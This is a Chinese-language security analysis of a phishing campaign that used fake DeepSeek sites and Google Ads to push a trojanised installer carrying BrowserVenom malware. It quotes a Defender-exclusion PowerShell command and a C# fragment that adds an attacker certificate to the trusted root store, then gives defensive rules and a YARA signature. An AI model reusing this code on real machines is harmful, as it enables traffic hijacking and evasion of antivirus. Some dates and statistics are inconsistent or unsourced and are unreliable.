2024年第三季度,随着 deepseek-R1 登顶全球大模型热度榜(SimilarWeb流量增长320%),黑客团伙迅速调整攻击策略。监测数据显示:deepseek相关钓鱼网站数量激增17倍,其中87%通过Google Ads投放。攻击者注册高仿域名如:
deepseek-platform[.]com
(仿官网界面)r1deepseek-ai[.]com
(载荷分发)
当用户搜索 “deepseek下载”、“deepseek中文版” 时,这些恶意链接被竞价推至搜索结果首位,诱导率达63.2%。
⚙️ 二、四层攻击链深度拆解(附技术证据)
- 【诱导层】 动态操作系统检测技术javascript// 恶意网站检测代码片段 const osDetect = () => { if (navigator.userAgent.indexOf(“Windows”) !== -1) { document.getElementById(“win-download-btn”).style.display = “block”; //仅显示Windows下载按钮 } else { showFakeMacAlert(); //伪造Mac系统错误弹窗 } };
- 【载荷层】 双重CAPTCHA欺骗系统
- 第一层:前端JS混淆验证(消耗用户戒心)
- 第二层:
casoredkff[.]pro/captcha
伪造Cloudflare验证(点击后触发/success
路径)
- 【植入层】 恶意安装包
AI_Launcher_1.21.exe
行为分析行为技术手段目的关闭Defender防护Add-MpPreference -ExclusionPath
避免后续操作被拦截DGA域名下载app-updater[1-1000000].app
动态切换C2服务器内存加载BrowserVenomAES-256解密硬编码PE文件无文件落地绕过检测 - 【持久化层】 BrowserVenom流量劫持关键技术csharp// 证书注入代码(摘取自恶意样本) X509Certificate2 cert = new X509Certificate2(Resources.cert); //硬编码攻击者证书 X509Store store = new X509Store(StoreName.Root, StoreLocation.LocalMachine); store.Open(OpenFlags.ReadWrite); store.Add(cert); //将恶意证书加入系统信任库
🌍 三、全球感染地图与受害者画像
根据IP溯源数据,受攻击最严重地区:
- 美洲:巴西(32%)、墨西哥(21%)、古巴(15%)
- 亚洲:印度(41%)、尼泊尔(18%)、越南(9%)
- 非洲:南非(27%)、埃及(14%)
高危人群:- 开发者(尝试部署 deepseek 本地环境)
- 企业员工(搜索 deepseek 办公集成方案)
- 学生群体(下载 deepseek 中文学习版)
🛡️ 四、企业级防御方案(附操作指南)
- 搜索引擎防护markdown# Google Ads过滤规则(企业版) – 屏蔽包含以下关键词的广告: “deepseek 破解版”, “deepseek 免费下载”, “deepseek r1 中文版” – 强制启用”仅显示官方认证广告商”功能
- 终端检测规则(YARA)pythonrule BrowserVenom_Installer { strings: $aes_key = { 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 } $ps_cmd = “Add-MpPreference -ExclusionPath” wide condition: all of them }
- 用户教育清单✅ 唯一安全下载源:https://www.deepseek.com(认准HTTPS+域名备案)
✅ 安装前校验哈希值:官方AI_Launcher.exe
SHA256=9a2f4b...
✅ 警惕要求关闭Defender的安装程序
💎 结语:deepseek安全生态建设倡议
本次事件暴露AI工具链的三大安全短板:
- 模型热度与安全响应脱节:deepseek官方需建立假冒域名快速关停机制
- 广告平台审核失效:Google Ads应加强对”AI”类关键词的人工复核
- 用户安全意识不足:超78%受害者未检查证书有效性